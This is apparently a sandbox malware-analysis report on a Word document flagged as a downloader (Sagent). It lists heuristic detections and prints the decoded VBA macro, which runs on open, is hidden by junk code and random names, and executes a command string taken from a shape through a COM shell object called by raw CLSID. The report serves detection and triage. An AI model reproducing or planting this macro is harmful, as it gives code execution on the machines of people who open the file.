MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Sagent-6766662-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-6766662-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Rbfjzt = 148575431 + CByte(LCaAUmR - Sqr(kjLVqK)) * VJUks - QdAzULiZ * ituAitYtE / CDate(320788491) * 77537730 * 137046410 / (204052125 - Sin(114799999)) Set ACEzt = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Rbfjzt = 148575431 + CByte(LCaAUmR - Sqr(kjLVqK)) * VJUks - QdAzULiZ * ituAitYtE / CDate(320788491) * 77537730 * 137046410 / (204052125 - Sin(114799999)) Set ACEzt = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7723 bytes |
SHA-256: d43e0ca3c54a60d1e3b01d5b2b171c8dae1a84b0c5d5b6d72d687a5318504da7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
126 of 198 identifiers look randomly generated (e.g. 'OzzMZNcPLZwzNf') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "svpZkXZXjOE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case wzdGYfKF
Case 155587058
IYKYw = 220395863
wvizhSJ = zBanCvaJQ
JPnNjooC = 238242064
Case 47683123
RnOtjOL = ChrW(189237657)
PfTKYdjR = CDate(136122207)
hOtnn = 119754033
End Select
lPuIfhCT = 228252844 + CByte(LuThPh - Sqr(VdvcoCE)) * hfZOXzb - wdwijkz * qpPXXA / CDate(154153117) * 123497367 * 219220128 / (121026023 - Sin(119566006))
On Error Resume Next
Select Case ziWhdr
Case 148624673
ZInQuWXGh = 118036196
fXjFBz = qzUntuBo
whAoN = 127757053
Case 228103571
kGWBR = ChrW(93287111)
SWqzvQd = CDate(142279553)
tAWcmPsP = 34303629
End Select
ZYhdBM = 271053198 + CByte(UubjZlw - Sqr(WECtpU)) * QvMwFX - OHwBozk * onGrJbIJa / CDate(245228183) * 211095851 * 117779595 / (291993741 - Sin(264683097))
Set aEMQio = Shapes("OzzMZNcPLZwzNf")
On Error Resume Next
Select Case zCEJz
Case 142153657
ZDzMK = 104418824
PrQKBqU = jWrXPB
LzrMLMzSN = 287074758
Case 268437309
OTEcYSsI = ChrW(41279548)
Qrkoi = CDate(128325969)
SZGEdrzU = 330667746
End Select
ISYDS = 83473322 + CByte(GviuS - Sqr(WsqDj)) * bXddl - RikkbHHZN * qhFwijim / CDate(268777732) * 255251723 * 340609672 / (136958446 - Sin(231249629))
On Error Resume Next
Select Case vJiqdwi
Case 286878348
AoNDitXh = 200533646
pKiAO = nVacY
znTDOTw = 99754725
Case 271865117
pQBFjtW = ChrW(161872028)
lnzRTNJQq = CDate(279596759)
DPPcpZk = 175766376
End Select
DlPKQUR = 336435149 + CByte(RtzBm - Sqr(kzWAqEDG)) * MUaAYQJ - vtlAX * AwvKHYwd / CDate(12890685) * 187190081 * 187164846 / (293362790 - Sin(272983030))
IsVtSXRXS = "" + rIkDIAm + ZAiqwwu + WBuuv + aEMQio.TextFrame.TextRange.Text + TkVhq + jSzYjbG + ijPPM
On Error Resume Next
Select Case wqEWbfn
Case 99970305
jjiUMH = 108468624
zQJLIQF = daUDhLY
lzZKREmz = 325032573
Case 2611581
LalCO = ChrW(227118574)
TBfJpa = CDate(335116084)
wESLj = 163206837
End Select
qiNiFE = 292889944 + CByte(LOINuvr - Sqr(GUSrWIc)) * wLQGh - lQiAjCp * cLaYTvjM / CDate(31634011) * 32789272 * 45797279 / (221686702 - Sin(83719416))
On Error Resume Next
Select Case mwKPp
Case 298840705
ZznanvO = 225852114
mjLsudJic = BOoJvTh
fvohX = 48919911
Case 152513638
zvzBhY = ChrW(238466587)
qfjZFJpcn = CDate(128157851)
KkorHFvjm = 29562058
End Select
IEVji = 91671013 + CByte(bodisSQm - Sqr(uVGMu)) * PMdKD - vmpzrlWcE * fbqLfOj / CDate(286026817) * 146333745 * 178818278 / (137420973 - Sin(332138795))
On Error Resume Next
Select Case FLXAJNkZ
Case 133205822
iwFEaJu = 132530515
WXzltNs = riVfFPbUK
zmMEvU = 28483297
Case 300289336
WWjcvf = ChrW(240714020)
KFainRV = CDate(301690329)
wuZjdjPwu = 218363501
End Select
Rbfjzt = 148575431 + CByte(LCaAUmR - Sqr(kjLVqK)) * VJUks - QdAzULiZ * ituAitYtE / CDate(320788491) * 77537730 * 137046410 / (204052125 - Sin(114799999))
Set ACEzt = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case EwjSFbmvn
Case 231967922
XvARqP = 159591360
GMjGTbAkl = wEIrLpSf
POmruwjN = 296571163
Case 152663589
JOvaI = ChrW(230874787)
rMqErAK = CDate(272854877)
GfjKwKi = 58013341
End Select
UVlKnNHN = 245399292 + CByte(kIiicRa - Sqr(tKXljF)) * ZhJMBw - mpoNmhZd * dPjFVYwHs / CDate(161054375) * 287980980 * 242593197 / (328508124 - Sin(86265137))
On Error Resume Next
Select Case hwWcmq
Case 289532403
biJtPX = 332219800
MBAmIkjVc = jDqELwzO
aJWjhBRnr = 322865279
Case 296394707
nzYOtKME = ChrW(326233717)
AzBHod = CDate(150984202)
LtAfXmq = 139186049
End Select
lrwoYj = 1155137 + CByte(ESpSnnKvK - Sqr(WfZNn)) * UlzkIb - YXrbNAbb * BMjLhD / CDate(154014447) * 41324005 * 278532208 / (236280180 - Sin(84528513))
On Error Resume Next
Select Case fwTjTM
Case 287472304
wLvvjHVC = 216351508
opZEhU = RrpvvV
JGzJiFJt = 222411550
Case 168013946
AADwXmCTQ = ChrW(90711313)
nbQzU = CDate(13210872)
CkAqNla = 67127566
End Select
XbGuHA = 78923790 + CByte(TMUTCtcF - Sqr(GTVsfk)) * YfprJ - RVNairKT * nPjfIhBzq / CDate(158576435) * 248003720 * 298057491 / (204896264 - Sin(46667630))
On Error Resume Next
Select Case XCWcfncQ
Case 208046481
ajQLQBGc = 142953631
wiMaD = ahwwvJBGE
cwlATF = 211530596
Case 240512072
vMPioi = ChrW(27248232)
njtpwYjN = CDate(308743129)
jlQhKH = 14754020
End Select
IrUotwc = 39608761 + CByte(jKwHQ - Sqr(UOZLYfZCn)) * lzzDNBI - OaNUwnvN * RzCwMQtwT / CDate(242706345) * 317801981 * 194433011 / (303403114 - Sin(234036687))
Const nAtHMsLFml = 0
On Error Resume Next
Select Case dwOMjtawD
Case 161244163
VNOYNMzIm = 164853968
sZsoYwS = nzAjl
pVSJjY = 27162451
Case 107675876
QLrFDwdk = ChrW(49188924)
AEoUrV = CDate(187152123)
vlrUidN = 156056908
End Select
fzCAYbjbc = 216104336 + CByte(OLJOtSkGA - Sqr(aoHtI)) * zwjNrjF - lEQcdEsOo * QjbdbMsH / CDate(151894862) * 273581043 * 35776897 / (71116231 - Sin(310567453))
ACEzt.Run@ IsVtSXRXS, nAtHMsLFml
On Error Resume Next
Select Case JBncD
Case 244539726
GNujwG = 60624321
Ujckoj = zjTBtNM
RXpRkvtq = 182314709
Case 120675448
DjiHl = ChrW(234713864)
doqRROY = CDate(257401563)
EJBrC = 304158111
End Select
cMHoYVap = 8384846 + CByte(kdnVbh - Sqr(VjXpAG)) * tzuphZa - JBBvi * wHOAPzivz / CDate(210520988) * 192551266 * 182281596 / (233942471 - Sin(144451092))
On Error Resume Next
Select Case MzXMwq
Case 83668135
szkzi = 89540379
Dkmzhcu = GYAvhwvwA
iBOhiFs = 170681730
Case 36476240
pMBsSDoD = ChrW(140214745)
tmRHRnwuf = CDate(48753070)
BkavLLVGh = 48559240
End Select
WNAtX = 49592970 + CByte(dHrcEdw - Sqr(GQqHwuwk)) * cazGsTzo - lPDHXQrR * zEZfz / CDate(337522053) * 178643632 * 29669833 / (35760976 - Sin(106743678))
On Error Resume Next
Select Case tKXcqtRJ
Case 184952118
QZqTBituz = 191816364
tiowvnTiK = GhiwPmjX
AEqXTInv = 339217481
Case 55425810
pjwmAj = ChrW(234250165)
uFwbRNJr = CDate(48330789)
lsMXKcq = 19551601
End Select
UoIrT = 170312042 + CByte(uZjwzjCAc - Sqr(CcYKJQja)) * PERWVv - aOsmNiBXS * IKXCpLvc / CDate(167497861) * 93869361 * 198444645 / (312669545 - Sin(73694012))
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.